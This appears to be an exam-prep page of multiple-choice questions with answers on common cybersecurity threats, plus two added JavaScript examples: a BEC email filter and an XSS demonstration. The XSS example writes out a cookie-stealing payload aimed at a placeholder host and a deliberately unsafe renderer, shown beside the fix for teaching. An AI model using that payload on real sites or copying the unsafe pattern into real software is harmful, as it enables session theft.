Identify Common Cybersecurity Threats And Vulnerabilities
CPA Information Systems and Controls (ISC) › Identify Common Cybersecurity Threats And Vulnerabilities
A company's employees receive emails appearing to be from the CEO asking them to urgently wire transfer funds to an external account. This attack is best described as:
A. A man-in-the-middle attack intercepting CEO communications.
B. A spear phishing / business email compromise (BEC) attack using impersonation to fraudulently induce financial transfers.
C. A ransomware attack encrypting company data for payment.
D. A distributed denial-of-service (DDoS) attack overwhelming the email server.
Explanation
BEC/spear phishing attacks impersonate executives, typically from a lookalike domain, a spoofed display name, or a compromised mailbox, and use urgency and authority to pressure employees into authorizing fraudulent transfers - a major source of financial fraud. Answer B is correct. MITM (A) intercepts active communications rather than impersonating a sender via email. Ransomware (C) encrypts data. DDoS (D) disrupts availability.
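The following is an added example, not part of the original question set, showing the kind of triage heuristics a mail filter applies to catch the pattern described above: an executive's display name on a message from outside the corporate domain, a Reply-To that redirects answers elsewhere, and a payment request paired with urgency or secrecy language. The corporate domain `example.com`, the executive name, and the three messages are all constructed for the demonstration.

```javascript
// Assumed setup for the example: the organisation's own domain and the
// display names of executives that attackers commonly impersonate.
const TRUSTED_DOMAIN = "example.com";
const EXECUTIVES = ["Jane Doe"];

// Constructed sample messages (not real mail): the minimal headers and body
// a filter would see. m1 is legitimate; m2 and m3 show two BEC patterns.
const samples = [
  { id: "m1", from: "Jane Doe <jane.doe@example.com>", replyTo: null,
    subject: "Q3 numbers", body: "Attached are the Q3 numbers for review." },
  { id: "m2", from: "Jane Doe <jane.doe@example-com.co>", replyTo: null,
    subject: "Urgent wire transfer",
    body: "I need you to wire $48,000 today. Confidential, do not call." },
  { id: "m3", from: "Jane Doe <jane.doe@example.com>", replyTo: "ceo.office@gmail.com",
    subject: "Quick favour",
    body: "Please process the payment to the new vendor account ASAP." },
];

// Split "Display Name <user@domain>" or a bare "user@domain" into parts.
function parseAddress(header) {
  const lt = header.indexOf("<"), gt = header.indexOf(">");
  let name = "", address = header.trim();
  if (lt !== -1 && gt > lt) {
    name = header.slice(0, lt).trim().replace(/^"|"$/g, "");
    address = header.slice(lt + 1, gt).trim();
  }
  const at = address.lastIndexOf("@");
  if (at === -1) return null;
  return { name, address: address.toLowerCase(), domain: address.slice(at + 1).toLowerCase() };
}

// Vocabulary seen in BEC lures; deliberately small for the example.
const URGENCY = /\b(urgent|asap|today|immediately|confidential|do not call)\b/i;
const PAYMENT = /\b(wire|transfer|payment|invoice|gift card|vendor account)\b/i;

// Returns { id, suspicious, reasons[] } for one message.
function assessMessage(msg) {
  const reasons = [];
  const from = parseAddress(msg.from);
  if (!from) return { id: msg.id, suspicious: true, reasons: ["unparseable From header"] };

  // 1. Executive display name, but the sending domain is not ours (lookalike or free-mail).
  const impersonatesExec = EXECUTIVES.some(n => n.toLowerCase() === from.name.toLowerCase());
  if (impersonatesExec && from.domain !== TRUSTED_DOMAIN) {
    reasons.push(`executive display name with external domain ${from.domain}`);
  }

  // 2. Reply-To sends the victim's answer to a domain other than the visible sender's.
  if (msg.replyTo) {
    const rt = parseAddress(msg.replyTo);
    if (rt && rt.domain !== from.domain) {
      reasons.push(`Reply-To domain ${rt.domain} differs from From domain ${from.domain}`);
    }
  }

  // 3. Payment instruction combined with pressure to act fast or keep quiet.
  const text = `${msg.subject}\n${msg.body}`;
  if (PAYMENT.test(text) && URGENCY.test(text)) {
    reasons.push("payment request with urgency/secrecy language");
  }

  return { id: msg.id, suspicious: reasons.length > 0, reasons };
}

// Run the triage over every sample message.
function triage(messages) {
  return messages.map(assessMessage);
}

console.log(JSON.stringify(triage(samples), null, 2));
```

These checks are a first-pass filter, not a control on their own: a legitimate executive mailing from a personal account trips rule 1, and a compromised internal mailbox (the most damaging BEC variant) trips none of them. The durable defenses are DMARC enforcement on the corporate domain and an out-of-band callback procedure before any payment instruction or bank-detail change is acted on.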
Ransomware is best described as:
A. A network attack that floods a target with traffic to make it unavailable.
B. Software that secretly monitors and transmits user activity to a remote attacker.
C. Malware that encrypts a victim's files or systems, rendering them inaccessible, and demands payment (usually cryptocurrency) in exchange for the decryption key.
D. A type of social engineering that tricks users into revealing passwords.
Explanation
Ransomware encrypts data and extorts payment for decryption - one of the most financially damaging cyberthreats to organizations. Many current operators also exfiltrate data before encrypting it and threaten to publish it ("double extortion"), so backups alone do not remove the leverage. Answer C is correct. Traffic flooding (A) describes DDoS. Silent monitoring and data exfiltration (B) describes spyware/RATs. Password extraction through deception (D) describes phishing.
An attacker intercepts communications between a user and their bank's website, reading and potentially modifying the traffic without either party's knowledge. This is best described as:
A. A denial-of-service attack.
B. A phishing attack.
C. A man-in-the-middle (MITM) attack.
D. A SQL injection attack.
Explanation
A MITM attack positions the attacker between two communicating parties, enabling interception and potential modification of the traffic without either party noticing. Properly validated TLS is the main control: the attacker can only read or alter the session if they can present a certificate the client trusts or downgrade the connection. Answer C is correct. DoS (A) disrupts availability. Phishing (B) deceives users into revealing credentials. SQL injection (D) targets databases through application input.
Social engineering attacks are most dangerous because they:
A. Exploit unpatched software vulnerabilities in operating systems.
B. Bypass technical controls by exploiting human psychology - manipulating people rather than systems.
C. Are conducted by highly skilled nation-state hackers.
D. Always result in complete system compromise and data exfiltration.
Explanation
Social engineering targets the human element - the weakest link in security - using deception, urgency, or authority to convince people to take actions that compromise security. Technical controls cannot fully prevent socially engineered attacks; training, verification procedures, and phishing-resistant MFA reduce the impact. Answer B is correct. Software vulnerabilities (A) and nation-state actors (C) describe technical attacks and attackers, not the reason social engineering is dangerous. Outcomes vary (D).
A distributed denial-of-service (DDoS) attack primarily threatens which element of the CIA triad?
A. Confidentiality - by exposing sensitive data to unauthorized parties.
B. Authentication - by bypassing login controls to gain unauthorized access.
C. Availability - by overwhelming systems with traffic to make them inaccessible to legitimate users.
D. Integrity - by modifying data in transit between systems.
Explanation
DDoS attacks overwhelm systems with traffic, making them unavailable - directly attacking the availability principle. Answer C is correct. DDoS does not typically expose data (A), modify data (D), or bypass authentication (B); note also that authentication is not one of the three elements of the CIA triad, which is a further reason to reject B.
An employee unknowingly installs software that appears to be a legitimate productivity tool but secretly creates a backdoor for attackers to access the corporate network. This malware type is called:
A. Ransomware - malware that encrypts files for extortion.
B. A worm - self-replicating malware that spreads across networks.
C. A Trojan horse - malware disguised as legitimate software that creates unauthorized access.
D. Adware - software that displays unwanted advertisements.
Explanation
A Trojan horse disguises itself as legitimate software to trick users into installing it, then executes malicious functionality such as opening a backdoor. Answer C is correct. Ransomware (A) encrypts data. Worms (B) spread without user action. Adware (D) displays ads.
Which of the following best describes an 'insider threat' in cybersecurity?
A. Attacks launched from inside the organization's firewall by external hackers who have breached the perimeter.
B. Threats that originate from internal vulnerability scanning activities.
C. Security risks posed by current or former employees, contractors, or partners who misuse their authorized access - whether maliciously or inadvertently.
D. Threats from employees who are unaware of the organization's security policies.
Explanation
Insider threats come from individuals with authorized access - including malicious insiders (data theft, sabotage), negligent insiders (accidental data disclosure), and compromised insiders (whose credentials are stolen and used by an outsider). Answer C is correct. Perimeter-breaching attackers (A) are external threats. Vulnerability scanning (B) is a security activity. Policy unawareness (D) is a training gap, not an insider threat category in itself.
Pretexting is a form of social engineering in which an attacker:
A. Uses malware to intercept keystrokes and capture passwords.
B. Sends mass emails impersonating a trusted organization to harvest login credentials.
C. Creates a fake website that closely mimics a legitimate one to steal credentials.
D. Creates a fabricated scenario (pretext) to manipulate a victim into revealing information or taking an action they otherwise wouldn't.
Explanation
Pretexting involves fabricating a believable story - posing as IT support, an auditor, or a vendor - to manipulate the victim. Answer D is correct. Keystroke capture (A) describes a keylogger. Mass credential-harvesting emails (B) describe phishing. Fake websites (C) describe website spoofing, the landing page of a phishing campaign.
Which of the following vulnerabilities does cross-site scripting (XSS) exploit?
A. Unpatched operating system vulnerabilities in web servers.
B. Weak password policies that allow brute-force attacks on web application accounts.
C. Insufficient input validation that allows attackers to inject malicious scripts into web pages viewed by other users.
D. Misconfigured database permissions allowing unauthorized SQL queries.
Explanation
XSS exploits insufficient validation and output encoding of user-supplied input to inject client-side scripts into web pages - scripts that execute in other users' browsers, potentially stealing session tokens (where cookies are not marked HttpOnly) or performing actions on their behalf. Answer C is correct. OS vulnerabilities (A), brute-force (B), and SQL permissions (D) are different vulnerability types.
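The following is an added example, not part of the original question set, contrasting the vulnerable pattern behind this question with its fix. A server-side renderer concatenates a user comment straight into HTML, so an attacker's comment becomes a live `<img onerror>` element in every other reader's browser; the hardened renderer encodes the five HTML-significant characters first. The comment strings and the `attacker.invalid` address are constructed for the demonstration.

```javascript
// Constructed inputs: a stored-XSS payload submitted as a "comment", and a
// benign comment containing characters that naive escaping often mishandles.
const attackerComment =
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\' + document.cookie)">';
const benignComment = 'Great post! 5 > 3 & "quotes" work.';

// VULNERABLE: untrusted input concatenated into the HTML body with no encoding.
// Whatever markup the user typed is parsed by the next reader's browser.
function renderCommentUnsafe(author, comment) {
  return `<div class="comment"><b>${author}</b>: ${comment}</div>`;
}

// Encode the characters that can change HTML structure in text and attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// HARDENED: the same template, but every untrusted value is encoded at output time.
// The attacker's text is displayed literally instead of being parsed as markup.
function renderCommentSafe(author, comment) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(comment)}</div>`;
}

// Helper for checking the result: list the element names the browser would parse
// from the rendered string. Only the template's own <div> and <b> should appear.
function extractTags(html) {
  return Array.from(html.matchAll(/<([a-z][a-z0-9]*)\b/gi), m => m[1].toLowerCase());
}

// Client-side equivalent of the same fix: DOM sinks like innerHTML parse markup,
// textContent does not. `node` is any object with a textContent property.
function renderIntoNode(node, comment) {
  node.textContent = comment;
  return node;
}

console.log("unsafe:", renderCommentUnsafe("alice", attackerComment));
console.log("safe:  ", renderCommentSafe("alice", attackerComment));
```

Output encoding is context-specific: `escapeHtml` is correct for HTML text and quoted attribute values, but a value placed inside a `<script>` block, a URL, or a CSS property needs that context's encoder instead. Defense in depth on top of encoding is a Content Security Policy that blocks inline script and `HttpOnly` on session cookies so a script that does run cannot read them.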
Which of the following best describes a 'supply chain attack' in cybersecurity?
A. An attack that compromises a trusted vendor or software update to deliver malware to the vendor's customers - targeting organizations indirectly through their trusted supply chain.
B. An attack that disrupts an organization's physical supply chain operations.
C. An attack targeting an organization's procurement system to manipulate purchase orders.
D. Social engineering of supply chain employees to gain physical access to warehouses.
Explanation
Supply chain attacks compromise trusted software, hardware, or service providers to reach a broader set of targets - exemplified by the SolarWinds attack where malware was distributed through a software update. Answer A is correct. Physical supply chain disruption (B), procurement system attacks (C), and physical access attacks (D) are different threat scenarios.